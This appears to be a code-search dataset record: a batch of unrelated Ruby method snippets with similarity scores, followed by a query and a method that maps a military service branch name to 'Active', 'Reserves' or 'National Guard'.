"def determine_class_data_for(mailClass)\n\t\tif mailClass == 'FC'\n\t\t\treturn '10' #Code for First Class Mail\n\t\telsif mailClass == 'PM' or mailClass == 'CM'\n\t\t\treturn '20' #Code for Priority Mail\n\t\telsif mailClass == 'S2'\n\t\t\treturn '40' #Code for Standard\n\t\telsif mailClass == 'SA'\n\t\t\treturn '90' #Code for Standard Non-Profit\n\t\telsif mailClass == 'CP'\n\t\t\treturn '7G' #Code for Priority Mail International\n\t\telsif mailClass == 'LC'\n\t\t\treturn '7K' #Code for FCPIS\n\t\telsif mailClass == 'PG' or mailClass == 'IE'\n\t\t\treturn '70' #Code for GxG or EMI\n\t\telsif mailClass == 'BB'\n\t\t\treturn '52' #Code for Bound Printed Matter\n\t\telsif mailClass == 'BL'\n\t\t\treturn '54' #Code for Library Mail\n\t\telsif mailClass == 'BS'\n\t\t\treturn '53' #Code for Media Mail\n\t\telsif mailClass == 'RP'\n\t\t\treturn '5I' #Code for PRS\n\t\telsif mailClass == 'PS' or mailClass == 'LW'\n\t\t\treturn '5H' #Code for Parcel Select\n\t\telse\n\t\t\treturn '50' #Package Services Default\n\t\tend\n\tend",
"def service_prov_name\n Output835.log.info \"Printing NM1*82 for Patient Acc Num : #{eob.patient_account_number}\"\n prov_id, qualifier = service_prov_identification\n service_prov_name_elements = []\n service_prov_name_elements << 'NM1'\n service_prov_name_elements << '82'\n service_prov_name_elements << (eob.rendering_provider_last_name.strip.blank? ? '2': '1')\n service_prov_name_elements << prov_last_name_or_org\n service_prov_name_elements << eob.rendering_provider_first_name\n service_prov_name_elements << eob.rendering_provider_middle_initial\n service_prov_name_elements << ''\n service_prov_name_elements << ''\n service_prov_name_elements << qualifier\n service_prov_name_elements << prov_id\n service_prov_name_elements = Output835.trim_segment(service_prov_name_elements)\n service_prov_name_elements.join(@element_seperator)\n end",
"def user_os_complex\r\n end",
"def program\n ::HubEdos::Common::Reference::Descriptor.new(@data['program']) if @data['program']\n end",
"def process_tokens(parts)\n # defaults/fallbacks\n type = 'system'\n action = 'event'\n\n parts.each do |token|\n if token.in? MODELS_WITH_EVENTS\n type = token\n elsif token[0..4].in? COMMON_EVENT_PREFIXES\n action = token\n end\n end\n\n return type, action\n end",
"def commandtype(line)\n case line\n when /^@/\n return \"A_COMMAND\"\n when /^\\w*=/\n return \"C_COMMAND\"\n when /^*;/\n return \"C_COMMAND\"\n when /^*\\(/\n return \"L_COMMAND\"\n end\n end",
"def get_program_def(name:)\n PROGRAMS[name]\n end",
"def system_class\n virt = node.virtualization\n if virt[:role]\n if virt[:role] == \"guest\" && virt[:system] == \"xen\"\n return \"xen-guest\"\n elsif virt[:role] == \"host\" && virt[:system] == \"xen\"\n return \"xen-host\"\n else\n return \"unknown-vm\"\n end\n else\n return \"hardware\"\n end\nend",
"def get_metrics_string(machine_name,product,type,studio_name)\n base_prefix = \"GRAPH-studio_global_\";\n base_suffix = \"\";\n if type==\"machine\" \n base_suffix = \"_retouch_v1.RESULT-\";\n elsif type == \"studio\"\n base_suffix = \"_retouch_v1.STUDIO-\" + studio_name;\n base_suffix += \".RESULT-\";\n end \n verdicts = product==\"apparel\" ? [\"ACCEPT\",\"PARTIAL_RESULT\",\"NO_RESULT\",\"REJECT\"] : [\"ACCEPT\",\"PARTIAL_RESULT\",\"NO_RESULT\",\"REJECT\",\"ERROR\"];\n base_prefix += product + \"_\";\n\n metricsname_list = [];\n for j in 0..verdicts.size-1\n metricsname_list.push(base_prefix+machine_name+base_suffix+verdicts[j]);\n end\n return metricsname_list;\n end",
"def get_event_type\n meeting_program ? meeting_program.event_type.i18n_short : (data_import_meeting_program ? data_import_meeting_program.event_type.i18n_short : '?')\n end",
"def get_event_type(code)\n type = EVENT_COMMAND_CODES[code]\n type.nil? ? [code, false] : type\nend",
"def [](process_name)\n if process_name.include? '.'\n select { |process| process.type == process_name }\n else\n select { |process| process.process == process_name }.first\n end\n end",
"def determine_event(group)\n case group\n when /_PregScreen_/\n PREGNANCY_SCREENER_EVENT\n when /Telephone/\n TELEPHONE_INTERVIEW_EVENT\n when /Text Message/\n TELEPHONE_INTERVIEW_EVENT\n when /Mail/\n MAILED_BACK_SAQ_EVENT\n when /_SAQ_/\n MAILED_BACK_SAQ_EVENT\n when /_HHEnum_/\n HOUSEHOLD_ENUMERATION_EVENT\n else\n GENERAL_STUDY_VISIT_EVENT\n end\n end",
"def resource_type_from_document(document)\n resource_type = \"\"\n\n #type_ssi\n #resource_type = document[\"format_ssi\"] unless document[\"format_ssi\"].nil?\n resource_type = document[\"format_ssi\"] || document[\"type_ssi\"]\n resource_type = resource_type.is_a?(Array) ? resource_type.first : resource_type\n end",
"def resource_type_from_document(document)\n resource_type = \"\"\n\n #type_ssi\n #resource_type = document[\"format_ssi\"] unless document[\"format_ssi\"].nil?\n resource_type = document[\"format_ssi\"] || document[\"type_ssi\"]\n resource_type = resource_type.is_a?(Array) ? resource_type.first : resource_type\n end",
"def reg_type\n attributes['reg_type'].downcase\n end",
"def get_os\n line = Cocaine::CommandLine.new('uname')\n output = line.run\n\n output.chomp.downcase.intern\n end",
"def get_event_type\n meeting_program ? meeting_program.event_type.i18n_short : '?'\n end",
"def get_event_type\n meeting_program ? meeting_program.event_type.i18n_short : '?'\n end",
"def availability_and_consultation_modes\n\t\thuman_attribute_names_if_present *(CONSULTATION_MODES + [:consult_remotely, :accepting_new_clients])\n\tend",
"def get_pdf_attributes_app_name()\n app_name = \"PDF Attributes\"\n return app_name\nend",
"def oem_name\n @values.fetch('ai.device.oemName') { \n @values['ai.device.oemName'] = nil\n }\n end",
"def get_device_info()\n @errors = []\n info = {}\n return info unless @programmer_path\n\n response = IO.popen(\"#{@programmer_path} I\").readlines\n puts response if $debug\n response.each do |line|\n if line =~ /Error/i\n errors << line\n else\n parts = line.split(/:|\\.\\.\\./)\n info[parts[0].strip.split.join.to_sym] = parts[1].strip if parts.size == 2\n end\n end # each\n info\n end",
"def service_prov_name(eob = nil,claim = nil )\n @eob = @eob.nil?? eob : @eob\n prov_id, qualifier = service_prov_identification\n ['NM1', '82', (@eob.rendering_provider_last_name.to_s.strip.blank? ? '2': '1'),\n prov_last_name_or_org, @eob.rendering_provider_first_name,\n @eob.rendering_provider_middle_initial, '', @eob.rendering_provider_suffix,\n qualifier, prov_id].trim_segment.join(@element_seperator)\n end",
"def scsb_request_map(request_type)\n if request_type == 'edd'\n 'EDD'\n else\n 'RETRIEVAL' # Default is print retrieval\n end\n end",
"def weams_type\n { \n 'ojt' => ojt?, 'correspondence' => correspondence?, 'flight' => flight?,\n 'foreign' => foreign?, 'public' => public?, 'for profit' => for_profit?,\n 'private' => private?\n }.find { |key, value| value }[0]\n end",
"def get(argvs)\n return nil unless argvs\n return nil unless argvs.is_a? Sisimai::Data\n return argvs.reason if argvs.reason.size > 0\n\n statuscode = argvs.deliverystatus\n statusmesg = argvs.diagnosticcode\n reasontext = ''\n\n CodeTable.each_key do |e|\n # Try to match with each regular expression of delivery status codes\n next unless statuscode =~ e\n CodeTable[e].each do |f|\n # Try to match with each regular expression of error messages\n next unless statusmesg =~ f[:regexp]\n reasontext = f[:reason]\n break\n end\n end\n\n return reasontext\n end",
"def proc_descr ( code = proc_code )\n proc = Procedure.find_by(code: code )\t \n return proc.descr rescue '' \n end",
"def format_rule_process\n XES::Trace.new.tap do |trace|\n trace.concept_name = \"rule_process %s\" % Util::UUID.generate\n trace.attributes << XES.string(\"pione:traceType\", \"rule_process\")\n trace.events = @rule_process_log.records.map do |record|\n XES::Event.new.tap do |event|\n # standard attributes\n event.concept_name = record.name\n event.org_resource = record.caller\n event.time_timestamp = record.timestamp\n event.lifecycle_transition = record.transition\n\n # pione extension attributes\n event.attributes << XES.string(\"pione:ruleType\", record.rule_type)\n end\n end\n end\n end",
"def gp_get_status(scope, query_aid = [])\n scope_byte = { :issuer_sd => 0x80, :apps => 0x40, :files => 0x20,\n :files_modules => 0x10 }[scope]\n data = Asn1Ber.encode [{:class => :application, :primitive => true,\n :number => 0x0F, :value => query_aid}]\n apps = [] \n first = true # Set to false after the first GET STATUS is issued.\n loop do\n raw = iso_apdu :cla => 0x80, :ins => 0xF2, :p1 => scope_byte,\n :p2 => (first ? 0 : 1), :data => [0x4F, 0x00]\n if raw[:status] != 0x9000 && raw[:status] != 0x6310 \n raise Smartcard::Iso::ApduException, raw\n end\n \n offset = 0\n loop do\n break if offset >= raw[:data].length\n aid_length, offset = raw[:data][offset], offset + 1\n app = { :aid => raw[:data][offset, aid_length] }\n offset += aid_length\n \n if scope == :issuer_sd\n lc_states = { 1 => :op_ready, 7 => :initialized, 0x0F => :secured,\n 0x7F => :card_locked, 0xFF => :terminated }\n lc_mask = 0xFF\n else\n lc_states = { 1 => :loaded, 3 => :installed, 7 => :selectable,\n 0x83 => :locked, 0x87 => :locked }\n lc_mask = 0x87\n end\n app[:lifecycle] = lc_states[raw[:data][offset] & lc_mask]\n\n permission_bits = raw[:data][offset + 1]\n app[:permissions] = Set.new()\n [[1, :mandated_dap], [2, :cvm_management], [4, :card_reset],\n [8, :card_terminate], [0x10, :card_lock], [0x80, :security_domain],\n [0xA0, :delegate], [0xC0, :dap_verification]].each do |mask, perm|\n app[:permissions] << perm if (permission_bits & mask) == mask\n end\n offset += 2\n \n if scope == :files_modules\n num_modules, offset = raw[:data][offset], offset + 1\n app[:modules] = []\n num_modules.times do\n aid_length = raw[:data][offset]\n app[:modules] << { :aid => raw[:data][offset + 1, aid_length] }\n offset += 1 + aid_length \n end\n end\n \n apps << app\n end\n break if raw[:status] == 0x9000\n first = false # Need more GET STATUS commands.\n end\n apps\n end",
"def get_os_attrs(source, attr, source_type)\n begin\n # grab the product name from the template we are current provisioning from\n if source_type == 'prov'\n os_name = source.source.operating_system.product_name rescue nil\n elsif source_type == 'vm'\n os_name = source.operating_system.product_name rescue nil\n else\n raise \"Invalid source_type input\"\n end\n\n log(:info, \"get_os_attrs: Returning Operating System attribute <#{attr}> for Operating System <#{os_name}>\")\n # first we must truncate the product name in a camel case format\n # e.g. Red Hat Enterprise Linux 6 = RedHatEnterpriseLinux6\n truncated_product_name = os_name.split('(').first.delete(' ')\n\n # return the requested attribute\n $evm.instantiate(\"#{OS_CLASS}/#{truncated_product_name}\")[attr]\n rescue => err\n log(:error, \"get_os_attrs: <#{err}>: Unable to return proper attribute <#{attr}> from os_name <#{os_name}>. Returning nil.\")\n return nil\n end\nend",
"def program_params\n params[:program]\n end",
"def calc_program_name project_symbol\n camel_to_snake_case(project_symbol).downcase\n end",
"def commandType\n result = \"\"\n if (@currentCommand.slice(0) == \"@\")\n result = \"A_COMMAND\"\n else\n result = \"C_COMMAND\"\n end\n return result\n end",
"def share_type(val)\n stypes = %W{ DISK PRINTER DEVICE IPC SPECIAL TEMPORARY }\n stypes[val] || 'UNKNOWN'\n end",
"def compare_scr\n line = Array.new\n @attribute_all.each_value{|const|\n const[1].each{|line,data|\n data.SDC.each{|sdc|\n sdc_tmp = sdc.gsub(\"\\*\",\"\").split[2].slice(2..1000)\n @RPT_ERR.each{|key,err|\n sig_tmp = err.SignalName.gsub(\"\\*\",\"\")\n if err.AttributeName == sdc.split[0] && sig_tmp == sdc_tmp\n data.ConstCheckFlag = 0\n data.SynthesisReport = err.Message\n noapply = Array.new\n noapply << line\n noapply << data.SDC\n noapply << err.Message\n @RPT_ErrorList << noapply\n end\n }\n }if data.SDC != nil\n }\n }\n end",
"def findFCName()\n doc = Hpricot::XML(open('Summary.xml'))\n fcName = \"\"\n (doc/:'ChipSummary').each do|summary|\n runFolder = (summary/'RunFolder').inner_html\n\n run = runFolder[/([a-zA-Z0-9]+)$/]\n\n if run.match(/^FC/)\n fcName = run.slice(2, run.size)\n else\n fcName = run\n end\n end\n # For HiSeqs, a flowcell is prefixed with letter \"A\" or \"B\".\n # We remove this prefix from the reduced flowcell name, since\n # a flowcell name is entered without the prefix letter in LIMS.\n # For GA2, there is no change.\n fcName.slice!(/^[a-zA-Z]/)\n return fcName\n end",
"def get_nameprog_swversion\r\n nomeprog = APP_CUPERATIVA_NAME\r\n ver_prog = CuperativaGui.sw_version_to_int\r\n return nomeprog, ver_prog\r\n end",
"def user_attributes_class\n return SAML::UserAttributes::SSOe if issuer&.match(/eauth\\.va\\.gov/)\n\n case authn_context\n when 'myhealthevet', 'myhealthevet_multifactor'\n SAML::UserAttributes::MHV\n when 'dslogon', 'dslogon_multifactor'\n SAML::UserAttributes::DSLogon\n when 'multifactor', 'dslogon_loa3', 'myhealthevet_loa3', LOA::IDME_LOA3, LOA::IDME_LOA1\n SAML::UserAttributes::IdMe\n else\n Raven.tags_context(\n authn_context: authn_context,\n controller_name: 'sessions',\n sign_in_method: 'not-signed-in:error'\n )\n raise 'InvalidAuthnContext'\n end\n end",
"def program_specific_validators\n return eh_program_specific_validators if product_test.reporting_program_type == 'eh'\n return ep_program_specific_validators if product_test.reporting_program_type == 'ep'\n\n []\n end",
"def pidof(program)\n pids = []\n full = cmd_exec('ps -elf').to_s\n full.split(\"\\n\").each do |pid|\n pids << pid.split(' ')[3].to_i if pid.include? program\n end\n pids\n end",
"def consultation_modes\n\t\thuman_attribute_names_if_present *CONSULTATION_MODES\n\tend",
"def cr_dmi_system\n return {} if @node.automatic_attrs[\"dmi\"].nil? || @node.automatic_attrs[\"dmi\"][\"system\"].nil?\n\n @node.automatic_attrs[\"dmi\"][\"system\"]\n end",
"def s_situational\n SegmentReqs_::Situational\n end",
"def which_suite()\n ret_val = case suite\n when \"H\" then \"Heart\"\n when \"C\" then \"Club\"\n when \"D\" then \"Diamond\"\n when \"S\" then \"Spades\"\n end\n ret_val\n end",
"def application_type\n return 'CH1606' if @application.chapter1606\n end",
"def attributes_for_code(code, code_system)\n @attributes.find_all { |e| e.send(:code) == code && e.send(:code_obj).send(:system) == code_system }\n end",
"def resource_type(resource)\n resource.xpath('string(command/ident/@value)')\n end",
"def resource_type(resource)\n resource.xpath('string(command/ident/@value)')\n end",
"def getDayProcessObjName\r\n\t\t\treturn \"mfiforce__Day_Process__c\"\r\n\t\tend",
"def get_key\n os = $driver.capabilities.platform.to_s.upcase\n if os.to_s == 'WINDOWS' || os.to_s == 'LINUX'\n return 'control'\n elsif os.to_s == 'DARWIN'\n return 'command'\n else\n raise 'Invalid OS'\n end\nend",
"def state\n results = (nodetool_netstats || '').split(\"\\n\")\n results.map! { |line| line.strip }\n results.select! { |line| line.include? 'Mode:' }\n results.map! { |line| line.split(':')[1] }\n results.compact!\n return nil if results.size != 1\n results.first.strip.downcase.to_sym\n end",
"def event_type\n @attributes[:event_type]\n end",
"def get_instance_system(code)\n return code[1][1]\n end",
"def review_mode\n if chronos_capacity_volume == 0\n \"paused\"\n elsif review_mail_recurrency\n \"mail\"\n else\n \"no_mail\"\n end\n end",
"def get_mode\n prompt = ''\n @transport.cmd('') { |c| prompt += c }\n match = /(?<hostname>[^\\(-\\)]+)(\\((?<text>[\\w\\-]+)\\))?(?<char>#|>)/.match(prompt)\n\n mode = nil\n\n if match && match['char']\n\n mode = case match['char']\n when '>' then :user\n when '#' then :privileged\n end\n\n end\n\n if match && match['text']\n mode = match['text'].to_sym\n end\n\n mode\n end",
"def get_rca_for_current_brd\n if is_broadcaster?\n sql = \"SELECT dg_rca.title FROM data_gateway as dg INNER JOIN data_group_rca as dg_rca on dg_rca.id = dg.rca_id\n WHERE dg.broadcast_id = #{self.sys_user_resource_broadcasts.first.broadcast_id} limit 1 \"\n rca_name = ActiveRecord::Base.connection.execute(sql).to_a\n rca_name = rca_name[0].present? && rca_name[0][0].present? ? rca_name[0][0] : \"null\"\n else\n \"null\"\n end\n end",
"def eval_service_provider_id\n service_provider_id = \"-\"\n if eob && eob.provider_npi.present?\n service_provider_id = eob.provider_npi\n elsif eob && eob.provider_tin.present?\n service_provider_id = eob.provider_tin\n elsif (!eob.blank? && !eob.claim_information.blank? && eob.claim_information.provider_npi.present?)\n service_provider_id = eob.claim_information.provider_npi\n elsif (!eob.blank? && !eob.claim_information.blank? && eob.claim_information.provider_ein.present?)\n service_provider_id = eob.claim_information.provider_ein\n elsif facility.facilities_npi_and_tins.present?\n service_provider_id = get_facility_npi_and_tin\n end\n service_provider_id\n end",
"def pdb_get_os(facts)\n if facts.is_a?(Hash) && !facts['operatingsystem'].nil? && !facts['operatingsystem']['value'].nil?\n os = facts['operatingsystem']['value']\n Puppet.info(\"#{log_prefix} puppet os for node is: os=#{os}\")\n if os.downcase == 'windows'\n os = 'Windows'\n elsif os.downcase == 'centos'\n os = 'CentOS'\n end\n\n Puppet.info(\"#{log_prefix} fiendly puppet os for node is: os=#{os}\")\n os\n else\n \"Unknown\"\n end\n end",
"def get_random_program_type\n DataUtility.select_random_from_options(@prng, ProgramType.all).key\n end",
"def resourceType\n 'RiskEvidenceSynthesis'\n end",
"def set_claim_type(proc_state)\n if proc_state == 'MANUAL_VAGOV'\n receiving_pension = false\n\n if Flipper.enabled?(:dependents_pension_check)\n pension_response = bid_service.get_awards_pension\n receiving_pension = pension_response.body['awards_pension']['is_in_receipt_of_pension']\n end\n\n if receiving_pension\n @end_product_name = 'PMC eBenefits School Attendance Reject'\n @end_product_code = '130SCAEBPMCR'\n else\n @end_product_name = 'eBenefits School Attendance Reject'\n @end_product_code = '130SCHEBNREJ'\n end\n end\n end",
"def combined_process_name(process_name)\n process_name[PROCESS_NAME_REGEX,1]\n end",
"def combined_process_name(process_name)\n process_name[PROCESS_NAME_REGEX,1]\n end",
"def combined_process_name(process_name)\n process_name[PROCESS_NAME_REGEX,1]\n end",
"def form_type(application)\n {\n CH33_30: 'CH33',\n CH33_1606: 'CH33',\n CH33_1607: 'CH33',\n CH1606: 'CH1606',\n CH30: 'CH30',\n CH32: 'CH32'\n }[application.form.to_sym]\n end",
"def get_other_fusion_guest_os(options)\n guest_os = \"otherguest\"\n return guest_os\nend",
"def get_attrib str\n return FFI::NCurses::A_NORMAL unless str\n # next line allows us to do a one time conversion and keep the value\n # in the same variable\n if str.is_a? Integer\n if [\n FFI::NCurses::A_BOLD,\n FFI::NCurses::A_REVERSE, \n FFI::NCurses::A_NORMAL,\n FFI::NCurses::A_UNDERLINE,\n FFI::NCurses::A_STANDOUT, \n FFI::NCurses::A_DIM, \n FFI::NCurses::A_BOLD | FFI::NCurses::A_REVERSE, \n FFI::NCurses::A_BOLD | FFI::NCurses::A_UNDERLINE, \n FFI::NCurses::A_REVERSE | FFI::NCurses::A_UNDERLINE, \n FFI::NCurses::A_BLINK\n ].include? str\n return str\n else\n raise ArgumentError, \"get_attrib got a wrong value: #{str} \"\n end\n end\n\n\n att = nil\n str = str.downcase.to_sym if str.is_a? String\n case str #.to_s.downcase\n when :bold\n att = FFI::NCurses::A_BOLD\n when :reverse\n att = FFI::NCurses::A_REVERSE \n when :normal\n att = FFI::NCurses::A_NORMAL\n when :underline\n att = FFI::NCurses::A_UNDERLINE\n when :standout\n att = FFI::NCurses::A_STANDOUT\n when :bold_reverse\n att = FFI::NCurses::A_BOLD | FFI::NCurses::A_REVERSE\n when :bold_underline\n att = FFI::NCurses::A_BOLD | FFI::NCurses::A_UNDERLINE\n when :dim\n att = FFI::NCurses::A_DIM \n when :blink\n att = FFI::NCurses::A_BLINK # unlikely to work\n else\n att = FFI::NCurses::A_NORMAL\n end\n return att\n end",
"def read_attributes(data)\n count = data.read_vint\n count.times do\n usage = data.read_uint8\n case usage\n when 0x00, 0x02, 0x03, 0x30, 0xa1..0xaf\n @attributes << { usage: usage, data: data.read_hex(32) }\n when 0x20\n @attributes << { usage: usage, data: data.read_hex(20) }\n else\n # TODO: Parse into plain string?\n @attributes << { usage: usage, data: data.read_hex }\n end\n end\n end",
"def getxattrs\n # # file: Scissor_Sisters_-_Invisible_Light.flv\n # user.m.options=\"-c\"\n\n cmd = %w[getfattr -d -m - -e base64] + [realpath.to_s]\n\n attrs = {}\n\n IO.popen(cmd, \"rb\", :err=>[:child, :out]) do |io|\n io.each_line do |line|\n if line =~ /^([^=]+)=0s(.+)/\n key = $1\n value = $2.from_base64 # unpack base64 string\n # value = value.encode(\"UTF-8\", \"UTF-8\") # set string's encoding to UTF-8\n value = value.force_encoding(\"UTF-8\").scrub # set string's encoding to UTF-8\n # value = value.encode(\"UTF-8\", \"UTF-8\") # set string's encoding to UTF-8\n\n attrs[key] = value\n end\n end\n end\n\n attrs\n end",
"def print_primary_attributes\n \"Strenght(STR):#{str}, Dexterity(DEX):#{dex}, Inteligence(INT):#{int}, Constitution(CON):#{con}, Appearence(APP):#{app}, Power(POW):#{pow}, Size:#{siz}, Education:#{edu}\"\n end",
"def type\n # If we know for sure its a backup\n if self.p_s_b == \"B\"\n return \"Backup\"\n else\n pmr = self.pmr\n param = self.to_param\n # Otherwise, try and figure out\n case param\n when pmr.primary_param\n return \"Primary\"\n when pmr.secondary_1_param\n return \"Sec 1\"\n when pmr.secondary_2_param\n return \"Sec 2\"\n when pmr.secondary_3_param\n return \"Sec 3\"\n else\n return \"Backup\"\n end\n end\n end"
] | [
"0.56413835",
"0.5547117",
"0.55038613",
"0.5410344",
"0.54024947",
"0.54024947",
"0.53961504",
"0.5374258",
"0.53301316",
"0.5328355",
"0.52793306",
"0.52515835",
"0.5239102",
"0.52355474",
"0.52233654",
"0.52154016",
"0.52050954",
"0.52020055",
"0.51988494",
"0.5191708",
"0.5179819",
"0.5164628",
"0.51469576",
"0.50200915",
"0.5014339",
"0.5013788",
"0.50042444",
"0.49865514",
"0.4984254",
"0.49798208",
"0.49750498",
"0.49676982",
"0.49583632",
"0.49528864",
"0.49504885",
"0.49349907",
"0.4924587",
"0.49136338",
"0.48878103",
"0.48827356",
"0.4870449",
"0.4864816",
"0.4864816",
"0.48646745",
"0.48640937",
"0.486356",
"0.486356",
"0.4861394",
"0.4856388",
"0.4854514",
"0.48539585",
"0.48530415",
"0.48507366",
"0.48431873",
"0.48369685",
"0.48315522",
"0.48263255",
"0.48119044",
"0.4808534",
"0.48070693",
"0.4806538",
"0.48064747",
"0.48003978",
"0.47918418",
"0.4791466",
"0.47914532",
"0.47820437",
"0.47750297",
"0.47679356",
"0.4765788",
"0.47654673",
"0.47644085",
"0.47628286",
"0.47626343",
"0.47615907",
"0.47511742",
"0.47511742",
"0.4749971",
"0.47482616",
"0.47474918",
"0.47426698",
"0.47374532",
"0.4733395",
"0.472638",
"0.47206503",
"0.47201702",
"0.47190046",
"0.47181413",
"0.47169825",
"0.47169676",
"0.47156224",
"0.47155476",
"0.47155476",
"0.47144222",
"0.47080687",
"0.4704217",
"0.4703341",
"0.4693119",
"0.46918884",
"0.46912578"
] | 0.7315199 | 0 |
returns either 'Active', 'Reserves' or 'National Guard' based on the service branch | def convert_to_service_component(service_branch)
service_branch = service_branch.downcase
return 'Reserves' if service_branch.include?('reserves')
return 'National Guard' if service_branch.include?('national guard')
'Active'
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def branch_of_service\n SERVICE_BRANCHES[branch_of_service_code]\n end",
"def hca_branch_of_service\n HCA_SERVICE_BRANCHES[branch_of_service_code] || 'other'\n end",
"def get_branch \n branch = case @os_svninfo['URL']\n when /trunk/ then \"trunk\"\n when /branches\\/private\\/([^\\/]+)/ then $1\n when /branches\\/([^\\/]+)/ then $1\n when /patches\\/([^\\/]+)/ then $1\n when /tags\\/([^\\/]+)/ then $1\n else fail(\"Can't determine which branch I'm operating on\")\n end\n branch\n end",
"def determine_branch_type(branch)\n return branch if (branch.downcase == \"develop\")\n branch =~ /^([a-zA-Z]+)-/\n if $1 && (%w(rc hotfix).member? $1.downcase)\n return $1.downcase\n else\n raise \"unrecognised branch prefix in '#{branch}'. Should be hotfix or rc\"\n end\nend",
"def get_vehicle_status\n if (@age < 5)\n return \"a service.\"\n end\n return \"to be scrapped.\"\n end",
"def current_branch\n return @branch unless @branch.blank?\n @branch = case @svninfo.url\n when /trunk/ then \"trunk\"\n when /branches\\/private\\/([^\\/]+)/ then $1\n when /branches\\/([^\\/]+)/ then $1\n when /tags\\/([^\\/]+)/ then $1\n else @config_source[\"branch\"]\n end \n @branch || \"unkown\"\n end",
"def branch\n Branch[comparable.segments.first(2).join('.')]\n end",
"def status\n branch&.status\n end",
"def status\n if canceled.present?\n return 'canceled'\n elsif returned.present?\n return 'returned'\n elsif due_back?\n return 'due back'\n elsif shipped.present?\n return 'shipped'\n elsif authorized\n return 'placed'\n else\n return 'placed'\n end\n end",
"def branch_name\n if name.in?(['Cole Taylor Bank', 'MB Financial Bank, N.A.'])\n sfx = Channel.consumer_direct.identifier.eql?(channel) ? ' CD' : ''\n \"MB #{city}#{sfx}\"\n else\n name\n end\n end",
"def component_branch(cmp)\n component(cmp).fetch('branch', CONF_DEFAULT_BRANCH)\nend",
"def component_branch(cmp)\n component(cmp).fetch('branch', CONF_DEFAULT_BRANCH)\nend",
"def branch_type\n data['branch-type']\n end",
"def state_group\n state = @current_policy ? @current_policy.tax_state_abbr : @company_info.hq_state\n case state\n when nil\n 'All'\n when 'CA'\n 'California'\n else\n 'non_California'\n end\n end",
"def status\n if status_code.present?\n if status_code['HL7 ActStatus']\n status_code['HL7 ActStatus'].first()\n elsif status_code['SNOMED-CT']\n case status_code['SNOMED-CT'].first()\n when '55561003'\n 'active'\n when '73425007'\n 'inactive'\n when '413322009' \n 'resolved'\n end\n end\n end\n end",
"def status_str\n case self.status\n when ACTIVE\n \"Active\"\n when INACTIVE\n \"Inactive\"\n when CLOSED\n \"Closed\"\n when NO_STRIPE\n \"No Stripe Account\"\n when UNKNOWN\n \"Unknown\"\n else\n \"Invalid\"\n end\n end",
"def get_reservation_status(reservation)\n owner = reservation.item_owner\n case reservation.status\n when \"pending_owner\"\n is_current_user?(owner) ? \"awaiting_acceptance_from_you\" : \"awaiting_acceptance_from_other_party\"\n when \"pending_reserver\"\n is_current_user?(owner) ? \"awaiting_acceptance_from_other_party\" : \"awaiting_acceptance_from_you\"\n else\n \"reservation_\" + reservation.status\n end \n end",
"def list_status\n if self.available_on.nil?\n nil\n elsif self.tba?\n 'TBA'\n elsif self.upcoming?\n 'Upcoming'\n elsif self.new?\n 'New'\n elsif self.recent?\n 'Recent'\n elsif self.backlist?\n 'Backlist'\n else\n nil\n end\n end",
"def state_or_province\n end",
"def state_or_province\n end",
"def derive_branch_name\n @config[:git][:branch] == 'preview' ? preview_branches.last : @config[:git][:branch]\n end",
"def status\n if caberawit?\n 'caberawit'\n elsif praremaja?\n 'praremaja'\n elsif remaja?\n 'remaja'\n elsif dewasa?\n 'dewasa'\n end\n end",
"def furnished_status_lookup(code)\n case code.to_i\n when 0 then 'Furnished'\n when 1 then 'Part Furnished'\n when 2 then 'Un-Furnished'\n when 3 then 'Not Specified'\n when 4 then 'Furnished / Un-Furnished'\n else nil\n end\n end",
"def get_status\n if draft\n :draft\n elsif closed || gross_amount <= paid_amount\n :closed\n elsif due_date and due_date > Date.today\n :opened\n else\n :overdue\n end\n end",
"def branch\n @env.fetch( :branch, \"N/A\" )\n end",
"def service_code\n \"#{shipment_mode_code}#{service_type_code}#{services_code}\"\n end",
"def branch_name\n $repo.current_branch\n end",
"def billing_state\n if deployments.any? { |d| d.billing_state == 'prepaid' }\n 'prepaid'\n else\n 'expired'\n end\n end",
"def branch \n extra[\"branch\"] \n end",
"def branch\n (@options[:branch] || 'master').to_s\n end",
"def branch\n (@options[:branch] || 'master').to_s\n end",
"def getMatchGitBranch(org_id)\n conf = loadIOSConfigFile(org_id)\n return conf['match_git_branch']\nend",
"def get_branch(status = `git status`)\n branch = nil\n if match = Regexp.new(\"^# On branch (.*)\").match(status)\n branch = match[1]\n end\nend",
"def brand\n cc_type\n end",
"def status_codes\n get_info :production_status\n end",
"def branch_name_value(branch_index=1)\n if @match_data.nil? || @match_data[branch_index].nil?\n branch_name = value_of_or_default(params[:branch_field], 'branch')\n else\n branch_name = @match_data[branch_index]\n end\n end",
"def get_merchant_status\n\t\tstatus = 'Pending'\n\t\tif self.paid?\n\t\t\tstatus = \"Paid\"\n\t\telsif self.fullfilled?\n\t\t\tstatus = \"Fullfilled\"\n\t\telsif self.cancelled?\n\t\t\tstatus = \"Cancelled\"\n\t\tend\n\t\tstatus\n\tend",
"def determine_branch_or_tag_name(repo)\n name = \"\"\n type = :none\n\n # first check if repo is in detached HEAD state\n if repo.head_detached?\n # check if current commit has a tag\n repo.tags.each do |tag|\n if tag.target.oid == repo.head.target_id\n name = tag.name\n type = :tag\n break\n end\n end\n\n # check if we got a tag name, otherwise it's a wild commit\n if type == :none\n name = repo.head.target_id[0..7]\n type = :commit\n end\n else\n # HEAD is not detached, so we are in a branch\n name = $branch_name\n type = :branch\n end\n\n return { name: name, type: type }\nend",
"def current_branch; end",
"def current_branch; end",
"def branchname\n @branchname ||= self.branch.name\n end",
"def company_code\n if self.yard.present? && self.yard.facility.present? && self.yard.facility.country.present?\n country = self.yard.facility.country\n \"COPART#{country.code}\".upcase\n else\n \"\"\n end\n end",
"def get_status\n if draft\n :draft\n elsif paid\n :paid\n elsif due_date\n if due_date > Date.today\n :pending\n else\n :overdue\n end\n else\n # An invoice without a due date can't be overdue\n :pending\n end\n end",
"def fetch_pre_decision_status\n if pending_schedule_hearing_task?\n :pending_hearing_scheduling\n elsif hearing_pending?\n :scheduled_hearing\n elsif evidence_submission_hold_pending?\n :evidentiary_period\n elsif at_vso?\n :at_vso\n elsif distributed_to_a_judge?\n :decision_in_progress\n else\n :on_docket\n end\n end",
"def state_s\n # return \"审核中\" if approving?\n return \"等待激活中\" if unapproved?\n return \"审核被拒绝\" if rejected?\n return \"展示中\" if opened? and available?\n return \"高亮展示中\" if highlighted? and opened? and available?\n return \"已过期\" if !available?\n return \"未展示\" if closed?\n end",
